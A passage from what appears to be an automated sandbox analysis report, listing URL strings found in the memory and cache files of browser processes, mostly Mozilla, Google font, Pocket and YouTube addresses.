Source: firefox.exe, 00000033.00000003.2632135362.0000026F525DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2632290478.0000026F525C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCapture
Source: firefox.exe, 00000031.00000002.4780134384.0000020345355000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000003.2698788329.000002034536D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureElementReleaseCaptureWarning
Source: firefox.exe, 00000031.00000002.4775596956.00000203450A0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureInstallTrigger.install()
Source: firefox.exe, 00000033.00000003.2632135362.0000026F525DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2632290478.0000026F525C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryption
Source: firefox.exe, 00000031.00000002.4753403845.0000020344896000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#EncryptionPreventDefaultFromP
Source: firefox.exe, 00000031.00000002.4775596956.00000203450A0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryptiondocument.requestSto
Source: scriptCache-child-new.bin.51.dr	String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 00000033.00000003.2632135362.0000026F525DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2632290478.0000026F525C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsing
Source: firefox.exe, 00000031.00000002.4753403845.0000020344896000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingDocumentWriteIgnored
Source: firefox.exe, 00000031.00000002.4775596956.00000203450A0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingTrying
Source: firefox.exe, 00000033.00000003.2957224507.0000026F5B267000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Mozilla/Tech/XPCOM/Reference/Interface/nsIEffectiveTLDServi
Source: firefox.exe, 00000033.00000003.2936611786.0000026F4A87F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 00000033.00000003.2936611786.0000026F4A87F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 00000033.00000003.2936611786.0000026F4A87F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2933058687.0000026F4A87F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C799000.00000004.00000800.00020000.00000000.sdmp, D0F48A0632B6C451791F4257697E861961F06A6F.51.dr	String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 00000033.00000003.2509868422.0000026F4D00E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2512730909.0000026F4D051000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2508170933.0000026F4E500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2510769501.0000026F4D030000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/
Source: Web Data.36.dr, QdX9ITDLyCRBWeb Data.2.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Web Data.36.dr, QdX9ITDLyCRBWeb Data.2.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Web Data.36.dr, QdX9ITDLyCRBWeb Data.2.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 00000033.00000003.2641907380.0000026F4CB93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2674983856.0000026F4CB98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000033.00000003.2816659490.0000026F4CB66000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2675052698.0000026F4CB78000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2900419944.0000026F4CB66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
Source: firefox.exe, 00000033.00000003.2816659490.0000026F4CB66000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2675052698.0000026F4CB78000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2900419944.0000026F4CB66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
Source: LICENSE.36.dr	String found in binary or memory: https://easylist.to/)
Source: 000003.log8.36.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.75/asset?sv=2017-07-29&sr=c&sig=
Source: firefox.exe, 00000033.00000003.2641907380.0000026F4CB93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2674983856.0000026F4CB98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 00000031.00000002.4780134384.0000020345355000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000003.2698788329.0000020345366000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2632135362.0000026F525DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2632290478.0000026F525C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/
Source: firefox.exe, 00000031.00000002.4775596956.00000203450A0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/initMouseEvent()
Source: chromecache_973.22.dr	String found in binary or memory: https://families.google.com/intl/
Source: scriptCache-child-new.bin.51.dr	String found in binary or memory: https://fb.me/react-polyfillsO
Source: scriptCache-child-new.bin.51.dr	String found in binary or memory: https://fb.me/react-polyfillsP
Source: scriptCache-child-new.bin.51.dr	String found in binary or memory: https://fb.me/react-polyfillsPO
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C799000.00000004.00000800.00020000.00000000.sdmp, D0F48A0632B6C451791F4257697E861961F06A6F.51.dr	String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 00000033.00000003.2947953057.0000026F5AD1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2950657995.0000026F5ADD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/673d2808-e5d8-41b9-957
Source: firefox.exe, 00000033.00000003.2947953057.0000026F5AD1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 00000033.00000003.2950657995.0000026F5ADD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/d8e772fe-4909-4f05-9f9
Source: scriptCache-child-new.bin.51.dr	String found in binary or memory: https://firefox-source-docs.mozilla.org/browser/components/newtab/content-src/asrouter/docs/debuggin
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 00000031.00000002.4773352643.0000020344EF0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000033.00000003.2823162996.0000026F52590000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2632290478.0000026F52590000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
Source: firefox.exe, 00000033.00000003.2901636266.0000026F4AA14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com
Source: firefox.exe, 00000031.00000003.2697145156.00000203444BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.4742743871.00000203444BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1
Source: firefox.exe, 00000031.00000003.2697145156.00000203444BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.4742743871.00000203444BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1#
Source: 254256B27E0C48CF9B80B695F0B3B8CA84610495.51.dr	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/
Source: scriptCache-child-new.bin.51.dr	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/nimbus-desktop-experiments
Source: firefox.exe, 00000033.00000003.2829314950.0000026F4AACF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2901112788.0000026F4AAC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/monitor/collections/changes/changeset?_expe
Source: scriptCache-child-new.bin.51.dr	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1i
Source: scriptCache-child-new.bin.51.dr	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1i#
Source: firefox.exe, 00000031.00000002.4763336635.0000020344D03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1lastExternalProtocolIframeAllowed
Source: firefox.exe, 00000031.00000002.4763336635.0000020344D03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1lastExternalProtocolIframeAllowedresetLastExternalPr
Source: B3316860430DA0966649580110E85D2FFB7B5A61.51.dr	String found in binary or memory: https://fonts.google.com/license/googlerestricted
Source: explorhe.exe, 0000002E.00000002.4711406923.000000000144A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css2?family=Nunito&display=swap
Source: B3316860430DA0966649580110E85D2FFB7B5A61.51.dr	String found in binary or memory: https://fonts.googleapis.com/css2?family=Roboto:wght
Source: firefox.exe, 00000033.00000003.2993278709.0000026F5DDE3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2992190171.0000026F5DDE3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto
Source: firefox.exe, 00000033.00000003.2993278709.0000026F5DDE3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2992190171.0000026F5DDE3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:300italic
Source: explorhe.exe, 0000002E.00000002.4711406923.000000000144A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993278709.0000026F5DDE3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2992190171.0000026F5DDE3000.00000004.00000800.00020000.00000000.sdmp, B3316860430DA0966649580110E85D2FFB7B5A61.51.dr	String found in binary or memory: https://fonts.gstatic.com
Source: firefox.exe, 00000033.00000003.2994582235.0000026F5DD3B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2992610961.0000026F5DD0B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2992520338.0000026F5DD3B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995940891.0000026F5DB17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fonts.gstatic.com/s/i/
Source: chromecache_973.22.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/productlogos/drive_2020q4/v10/192px.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/productlogos/gmail_2020q4/v10/web-48dp/logo_gmail_2020q4_color_2x_web_
Source: chromecache_973.22.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/productlogos/maps/v7/192px.svg
Source: EA86BF7019DD8098795FFCEA42753555A3DB9D39.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/youtube_fill/arrow_time/v8/24px.svg
Source: BD9CCF8167873D4A01DE1EEBD3F3CF68BFCB4751.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/youtube_fill/fashion/v2/24px.svg
Source: C050C2250D3FDC6BFC8EFB79D6C18D4D0402B6F0.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/youtube_fill/news/v2/24px.svg
Source: F3373B24AB67D455B207FA78D3E7D012A32DE837.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/youtube_fill/search/v7/24px.svg
Source: 257FC89A8CE7665B22FB6627E176B74644190734.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/youtube_outline/bag/v4/24px.svg
Source: 0278A230C96F3CCD360EFD91F1D95D1D65C5FACB.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/youtube_outline/clock/v7/24px.svg
Source: E210649FB7358F58475F6B3C24C6B61E88CBB00B.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/youtube_outline/news/v2/24px.svg
Source: C5658B5685DF72437813C7814625E1F931F14709.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/youtube_outline/play_arrow/v7/24px.svg
Source: 3892996081ABC95E471CC4B3AE0A858E7A52E706.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/youtube_outline/price_tag/v5/24px.svg
Source: 58A3645EA63E34F9D1E58BD69BF9287063486081.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/youtube_outline/question_circle/v5/24px.svg
Source: B3B0E252350B538B85FDCD7986C1EF6D495A2570.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/youtube_outline/sparkle/v2/24px.svg
Source: F4CB304FD4D03C53B6509A69A0C573AE3FFCA86F.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/youtube_outline/thumb_up/v17/24px.svg
Source: 953DC40B3D4543FF21CAD0E01B081EBB46362B01.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/youtube_outline/video_camera_add/v1/24px.svg
Source: B3316860430DA0966649580110E85D2FFB7B5A61.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9fABc4EsA.woff2)
Source: B3316860430DA0966649580110E85D2FFB7B5A61.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9fBBc4.woff2)
Source: B3316860430DA0966649580110E85D2FFB7B5A61.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9fBxc4EsA.woff2)
Source: B3316860430DA0966649580110E85D2FFB7B5A61.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9fCBc4EsA.woff2)
Source: B3316860430DA0966649580110E85D2FFB7B5A61.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9fCRc4EsA.woff2)
Source: B3316860430DA0966649580110E85D2FFB7B5A61.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9fChc4EsA.woff2)
Source: B3316860430DA0966649580110E85D2FFB7B5A61.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9fCxc4EsA.woff2)
Source: B3316860430DA0966649580110E85D2FFB7B5A61.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fABc4EsA.woff2)
Source: B3316860430DA0966649580110E85D2FFB7B5A61.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fBBc4.woff2)
Source: B3316860430DA0966649580110E85D2FFB7B5A61.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fBxc4EsA.woff2)
Source: B3316860430DA0966649580110E85D2FFB7B5A61.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fCBc4EsA.woff2)
Source: B3316860430DA0966649580110E85D2FFB7B5A61.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fCRc4EsA.woff2)
Source: B3316860430DA0966649580110E85D2FFB7B5A61.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fChc4EsA.woff2)
Source: B3316860430DA0966649580110E85D2FFB7B5A61.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fCxc4EsA.woff2)
Source: B3316860430DA0966649580110E85D2FFB7B5A61.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfABc4EsA.woff2)
Source: B20635A9E3239966DF1AF8702BD403FE7FB90005.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfBBc4.woff2
Source: B3316860430DA0966649580110E85D2FFB7B5A61.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfBBc4.woff2)
Source: B3316860430DA0966649580110E85D2FFB7B5A61.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfBxc4EsA.woff2)
Source: B3316860430DA0966649580110E85D2FFB7B5A61.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfCBc4EsA.woff2)
Source: B3316860430DA0966649580110E85D2FFB7B5A61.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfCRc4EsA.woff2)
Source: B3316860430DA0966649580110E85D2FFB7B5A61.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfChc4EsA.woff2)
Source: B3316860430DA0966649580110E85D2FFB7B5A61.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfCxc4EsA.woff2)
Source: B3316860430DA0966649580110E85D2FFB7B5A61.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu4WxKOzY.woff2)
Source: B3316860430DA0966649580110E85D2FFB7B5A61.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu4mxK.woff2)
Source: B3316860430DA0966649580110E85D2FFB7B5A61.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu5mxKOzY.woff2)
Source: B3316860430DA0966649580110E85D2FFB7B5A61.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu72xKOzY.woff2)
Source: B3316860430DA0966649580110E85D2FFB7B5A61.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu7GxKOzY.woff2)
Source: B3316860430DA0966649580110E85D2FFB7B5A61.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu7WxKOzY.woff2)
Source: B3316860430DA0966649580110E85D2FFB7B5A61.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu7mxKOzY.woff2)
Source: B3316860430DA0966649580110E85D2FFB7B5A61.51.dr, 599ED0EF31CAD4FEF69926D3A322C3A0364B4B00.51.dr	String found in binary or memory: https://fonts.gstatic.com/s/youtubesans/v23/Qw38ZQNGEDjaO2m6tqIqX5E-AVS5_rSejo46_PCTRspJ0OosolrBEJL3
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C73D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC83000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2992813819.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://garlo.com/enapa2%3Fgc_id%3D20599670093&label=video_click_to_advertiser_site&ctype=110
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C799000.00000004.00000800.00020000.00000000.sdmp, D0F48A0632B6C451791F4257697E861961F06A6F.51.dr	String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: D0F48A0632B6C451791F4257697E861961F06A6F.51.dr	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: D0F48A0632B6C451791F4257697E861961F06A6F.51.dr	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C799000.00000004.00000800.00020000.00000000.sdmp, D0F48A0632B6C451791F4257697E861961F06A6F.51.dr	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C799000.00000004.00000800.00020000.00000000.sdmp, D0F48A0632B6C451791F4257697E861961F06A6F.51.dr	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: scriptCache-child-new.bin.51.dr	String found in binary or memory: https://getpocket.com/
Source: scriptCache-child-new.bin.51.dr	String found in binary or memory: https://getpocket.com/a4
Source: scriptCache-child-new.bin.51.dr	String found in binary or memory: https://getpocket.com/collections
Source: scriptCache-child-new.bin.51.dr	String found in binary or memory: https://getpocket.com/explore/
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C799000.00000004.00000800.00020000.00000000.sdmp, D0F48A0632B6C451791F4257697E861961F06A6F.51.dr	String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C799000.00000004.00000800.00020000.00000000.sdmp, D0F48A0632B6C451791F4257697E861961F06A6F.51.dr	String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C799000.00000004.00000800.00020000.00000000.sdmp, D0F48A0632B6C451791F4257697E861961F06A6F.51.dr	String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C799000.00000004.00000800.00020000.00000000.sdmp, D0F48A0632B6C451791F4257697E861961F06A6F.51.dr	String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C799000.00000004.00000800.00020000.00000000.sdmp, D0F48A0632B6C451791F4257697E861961F06A6F.51.dr	String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C799000.00000004.00000800.00020000.00000000.sdmp, D0F48A0632B6C451791F4257697E861961F06A6F.51.dr	String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C799000.00000004.00000800.00020000.00000000.sdmp, D0F48A0632B6C451791F4257697E861961F06A6F.51.dr	String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: D0F48A0632B6C451791F4257697E861961F06A6F.51.dr	String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C799000.00000004.00000800.00020000.00000000.sdmp, D0F48A0632B6C451791F4257697E861961F06A6F.51.dr	String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: D0F48A0632B6C451791F4257697E861961F06A6F.51.dr	String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: scriptCache-child-new.bin.51.dr	String found in binary or memory: https://getpocket.com/read/$
Source: D0F48A0632B6C451791F4257697E861961F06A6F.51.dr, scriptCache-child-new.bin.51.dr	String found in binary or memory: https://getpocket.com/recommendations
Source: LICENSE.36.dr	String found in binary or memory: https://github.com/easylist)
Source: firefox.exe, 00000033.00000003.2936611786.0000026F4A87F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2933058687.0000026F4A87F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 00000033.00000003.2936611786.0000026F4A87F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: firefox.exe, 00000033.00000003.2936611786.0000026F4A87F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 00000033.00000003.2509868422.0000026F4D00E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2508170933.0000026F4E500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2510769501.0000026F4D030000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: scriptCache-child-new.bin.51.dr	String found in binary or memory: https://github.com/projectfluent/fluent.js/wiki/React-Overlays.
Source: scriptCache-child-new.bin.51.dr	String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 00000033.00000003.2636361533.0000026F5191C000.00000004.00000800.00020000.00000000.sdmp, D0F48A0632B6C451791F4257697E861961F06A6F.51.dr	String found in binary or memory: https://google.com
Source: firefox.exe, 00000033.00000003.2635411054.0000026F5196B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: scriptCache-child-new.bin.51.dr	String found in binary or memory: https://help.getpocket.com/article/1142-firefox-new-tab-recommendations-faq
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 00000031.00000002.4763336635.0000020344D03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: scriptCache-child-new.bin.51.dr	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881a
Source: firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i.ytimg.com/an/
Source: FE1F5B94E735CF25E43C634E82ECB06C772BE012.51.dr	String found in binary or memory: https://i.ytimg.com/generate_204
Source: firefox.exe, 00000033.00000003.2994692431.0000026F5DBF3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i.ytimg.com/sb/
Source: firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993102927.0000026F5DB8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i.ytimg.com/vi/
